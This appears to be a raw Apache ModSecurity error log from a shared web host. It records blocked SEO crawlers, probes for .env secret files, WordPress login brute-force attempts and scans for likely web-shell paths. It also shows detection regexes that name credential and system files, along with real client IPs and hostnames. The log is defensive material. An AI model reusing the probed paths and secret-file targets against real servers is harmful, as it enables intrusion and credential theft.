[Tue May 26 19:18:28.808134 2026] [security2:error] [pid 26857:tid 27082] [client 54.39.136.184:29564] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "bosscoirs.com"] [uri "/"] [unique_id "ahWkrNfoqtHEG_e9i6HUXwAAAOQ"]
[Tue May 26 19:18:28.808248 2026] [security2:error] [pid 26857:tid 27082] [client 54.39.136.184:29564] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "bosscoirs.com"] [uri "/"] [unique_id "ahWkrNfoqtHEG_e9i6HUXwAAAOQ"]
[Tue May 26 19:18:29.928087 2026] [security2:error] [pid 26857:tid 27010] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkrdfoqtHEG_e9i6HUhwAAAJw"]
[Tue May 26 19:18:30.524946 2026] [security2:error] [pid 26857:tid 26988] [client 91.227.114.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahWkrtfoqtHEG_e9i6HUxAAAAIY"]
[Tue May 26 19:18:30.796658 2026] [security2:error] [pid 26857:tid 27060] [client 91.227.114.29:7070] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahWkrtfoqtHEG_e9i6HU0gAAzis"]
[Tue May 26 19:18:32.127669 2026] [security2:error] [pid 26857:tid 27006] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkr9foqtHEG_e9i6HVCgAAAJg"]
[Tue May 26 19:18:34.283220 2026] [security2:error] [pid 26857:tid 27077] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWksdfoqtHEG_e9i6HVfAAAAN8"]
[Tue May 26 19:18:34.613028 2026] [security2:error] [pid 26857:tid 27053] [client 176.65.139.234:60376] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env"] [unique_id "ahWkstfoqtHEG_e9i6HVnAAAAMc"]
[Tue May 26 19:18:34.694601 2026] [security2:error] [pid 26857:tid 27022] [client 114.119.139.42:39277] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.acacia.org.in"] [uri "/acacia-declaration.php"] [unique_id "ahWkstfoqtHEG_e9i6HVngAAAKg"], referer: http://www.acacia.org.in/
[Tue May 26 19:18:36.048983 2026] [security2:error] [pid 26857:tid 27052] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWks9foqtHEG_e9i6HV2AAAAMY"]
[Tue May 26 19:18:36.178693 2026] [security2:error] [pid 26857:tid 27003] [client 185.191.171.2:62178] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/january-6th/list/"] [unique_id "ahWktNfoqtHEG_e9i6HV9gAAAJU"]
[Tue May 26 19:18:36.178781 2026] [security2:error] [pid 26857:tid 27003] [client 185.191.171.2:62178] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/january-6th/list/"] [unique_id "ahWktNfoqtHEG_e9i6HV9gAAAJU"]
[Tue May 26 19:18:36.195076 2026] [security2:error] [pid 26857:tid 26956] [remote 216.73.217.110:42372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/online.php"] [unique_id "ahWktNfoqtHEG_e9i6HV-AAAl2I"]
[Tue May 26 19:18:36.304903 2026] [security2:error] [pid 26857:tid 26946] [remote 216.73.216.30:6218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWktNfoqtHEG_e9i6HV-gAAh1g"]
[Tue May 26 19:18:37.442878 2026] [security2:error] [pid 26857:tid 27021] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWktNfoqtHEG_e9i6HWIgAAAKc"]
[Tue May 26 19:18:40.172092 2026] [security2:error] [pid 26857:tid 27052] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkt9foqtHEG_e9i6HWsgAAAMY"]
[Tue May 26 19:18:40.227454 2026] [security2:error] [pid 26857:tid 27040] [client 114.119.134.146:40125] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "bhavisharchitects.com"] [uri "/blog/best-architect-in-chennai/"] [unique_id "ahWkuNfoqtHEG_e9i6HWzQAAALo"], referer: https://bhavisharchitects.com/blogs/
[Tue May 26 19:18:41.031041 2026] [security2:error] [pid 26857:tid 27092] [client 176.65.139.231:62958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "nachiresidency.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWkudfoqtHEG_e9i6HW_QAAAO4"]
[Tue May 26 19:18:41.739149 2026] [security2:error] [pid 26857:tid 27082] [client 176.65.139.235:49596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mbcharity.org.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWkudfoqtHEG_e9i6HXHgAAAOQ"]
[Tue May 26 19:18:42.178988 2026] [security2:error] [pid 26857:tid 27063] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkudfoqtHEG_e9i6HXHwAAANE"]
[Tue May 26 19:18:42.338413 2026] [security2:error] [pid 26857:tid 27064] [client 176.65.139.229:50696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "pstta.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWkutfoqtHEG_e9i6HXPgAAANI"]
[Tue May 26 19:18:44.082822 2026] [security2:error] [pid 26857:tid 27002] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWku9foqtHEG_e9i6HXggAAAJQ"]
[Tue May 26 19:18:45.707587 2026] [security2:error] [pid 26857:tid 26970] [remote 198.244.226.3:37368] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "agsnails.com"] [uri "/robots.txt"] [unique_id "ahWkvdfoqtHEG_e9i6HX7wAAhXA"]
[Tue May 26 19:18:45.707753 2026] [security2:error] [pid 26857:tid 26987] [client 198.244.226.3:37368] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "agsnails.com"] [uri "/robots.txt"] [unique_id "ahWkvdfoqtHEG_e9i6HX7wAAhXA"]
[Tue May 26 19:18:45.890238 2026] [security2:error] [pid 26857:tid 27038] [client 176.65.139.229:50734] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "sonaminahotels.svijaykumar.in"] [uri "/.env"] [unique_id "ahWkvdfoqtHEG_e9i6HYAAAAALg"]
[Tue May 26 19:18:46.058326 2026] [core:error] [pid 26857:tid 27035] [client 51.77.74.125:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:18:46.058348 2026] [core:error] [pid 26857:tid 27035] [client 51.77.74.125:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:18:46.291392 2026] [security2:error] [pid 26857:tid 26995] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkvdfoqtHEG_e9i6HX-AAAAI0"]
[Tue May 26 19:18:47.491148 2026] [security2:error] [pid 26857:tid 26961] [remote 51.222.168.121:43004] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "agsnails.com"] [uri "/"] [unique_id "ahWkv9foqtHEG_e9i6HYXwAA9mc"]
[Tue May 26 19:18:47.491352 2026] [security2:error] [pid 26857:tid 27100] [client 51.222.168.121:43004] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "agsnails.com"] [uri "/"] [unique_id "ahWkv9foqtHEG_e9i6HYXwAA9mc"]
[Tue May 26 19:18:47.636886 2026] [security2:error] [pid 26857:tid 27084] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkv9foqtHEG_e9i6HYTAAAAOY"]
[Tue May 26 19:18:48.042026 2026] [http2:info] [pid 37506:tid 37506] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 19:18:48.603003 2026] [security2:error] [pid 26857:tid 26975] [remote 162.214.184.71:33326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.184.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkwNfoqtHEG_e9i6HYYAAAmHU"]
[Tue May 26 19:18:48.692245 2026] [security2:error] [pid 37506:tid 37667] [client 102.164.188.174:20752] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "erp.azurmediatec.com"] [uri "/compta/bank/various_payment/card.php"] [unique_id "ahWkwAKctTPx5f8aOzkB-QAAH20"], referer: https://erp.azurmediatec.com/compta/bank/various_payment/card.php?action=create
[Tue May 26 19:18:49.609390 2026] [security2:error] [pid 37506:tid 37513] [remote 123.30.233.12:51980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkwQKctTPx5f8aOzkCLQAATQY"]
[Tue May 26 19:18:49.749766 2026] [security2:error] [pid 37506:tid 37755] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkwQKctTPx5f8aOzkCJgAAAHc"]
[Tue May 26 19:18:50.189697 2026] [security2:error] [pid 37506:tid 37522] [remote 123.30.233.12:51980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkwgKctTPx5f8aOzkCVAAAXg8"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:18:50.576459 2026] [security2:error] [pid 37506:tid 37715] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkwgKctTPx5f8aOzkCWwAAAE8"]
[Tue May 26 19:18:50.921751 2026] [security2:error] [pid 37506:tid 37633] [remote 14.161.17.36:51640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkwgKctTPx5f8aOzkCdwAAeH4"]
[Tue May 26 19:18:51.693357 2026] [security2:error] [pid 37506:tid 37658] [client 157.33.27.196:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkwwKctTPx5f8aOzkCmQAAABY"]
[Tue May 26 19:18:52.657600 2026] [security2:error] [pid 37506:tid 37756] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkxAKctTPx5f8aOzkCywAAAHg"]
[Tue May 26 19:18:53.392538 2026] [security2:error] [pid 37506:tid 37555] [remote 173.236.37.42:55258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.37.236.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkxQKctTPx5f8aOzkC_wAAPTA"]
[Tue May 26 19:18:55.055922 2026] [security2:error] [pid 37506:tid 37705] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkxgKctTPx5f8aOzkDTAAAAEU"]
[Tue May 26 19:18:57.116449 2026] [security2:error] [pid 37506:tid 37732] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkyAKctTPx5f8aOzkDrAAAAGA"]
[Tue May 26 19:18:57.181149 2026] [security2:error] [pid 37506:tid 37603] [remote 216.73.216.30:46176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWkyQKctTPx5f8aOzkDwwAACGA"]
[Tue May 26 19:18:57.285690 2026] [security2:error] [pid 37506:tid 37604] [remote 173.236.37.42:55258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.37.236.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkyQKctTPx5f8aOzkDxwAAamE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:18:59.370130 2026] [security2:error] [pid 37506:tid 37658] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkygKctTPx5f8aOzkEHgAAABY"]
[Tue May 26 19:18:59.780701 2026] [security2:error] [pid 37506:tid 37517] [remote 162.214.184.71:35806] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.184.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkywKctTPx5f8aOzkERgAAEgo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:19:01.883345 2026] [security2:error] [pid 37506:tid 37542] [remote 216.73.216.30:46176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWkzQKctTPx5f8aOzkEswAACCM"]
[Tue May 26 19:19:02.038874 2026] [security2:error] [pid 37506:tid 37688] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkzQKctTPx5f8aOzkEpQAAADQ"]
[Tue May 26 19:19:02.393979 2026] [security2:error] [pid 37506:tid 37537] [remote 162.241.152.21:36768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWkzgKctTPx5f8aOzkEwAAAaB4"]
[Tue May 26 19:19:02.633743 2026] [security2:error] [pid 37506:tid 37539] [remote 162.241.152.21:36768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWkzgKctTPx5f8aOzkEzgAARSA"], referer: https://christinaspromotions.com/wp-login.php
[Tue May 26 19:19:04.016053 2026] [security2:error] [pid 37506:tid 37757] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkzwKctTPx5f8aOzkFAAAAAHk"]
[Tue May 26 19:19:05.069282 2026] [authz_core:error] [pid 37506:tid 37756] [client 176.65.139.239:41096] AH01630: client denied by server configuration: /home2/azurm42s/public_html/erptrn.azurmediatec.com/.env
[Tue May 26 19:19:06.283999 2026] [security2:error] [pid 37506:tid 37640] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk0QKctTPx5f8aOzkFdQAAAAQ"]
[Tue May 26 19:19:07.879734 2026] [security2:error] [pid 37506:tid 37602] [remote 47.128.127.99:41584] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "staging.unsobered.com"] [uri "/category/spirit-in-focus/vodka/"] [unique_id "ahWk0wKctTPx5f8aOzkFzgAATF8"]
[Tue May 26 19:19:08.128324 2026] [security2:error] [pid 37506:tid 37688] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk0wKctTPx5f8aOzkFygAAADQ"]
[Tue May 26 19:19:08.251544 2026] [security2:error] [pid 37506:tid 37699] [client 20.29.64.60:5506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "wrapmachines.com"] [uri "/wp-plain.php"] [unique_id "ahWk1AKctTPx5f8aOzkF4gAAAD8"], referer: www.google.com
[Tue May 26 19:19:08.331698 2026] [security2:error] [pid 37506:tid 37743] [client 20.29.64.60:5535] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "wrapmachines.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWk1AKctTPx5f8aOzkF7AAAAGs"], referer: www.google.com
[Tue May 26 19:19:08.913981 2026] [security2:error] [pid 37506:tid 37749] [client 20.29.64.60:5513] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "wrapmachines.com"] [uri "/vujykxlz.php"] [unique_id "ahWk1AKctTPx5f8aOzkGBQAAAHE"], referer: www.google.com
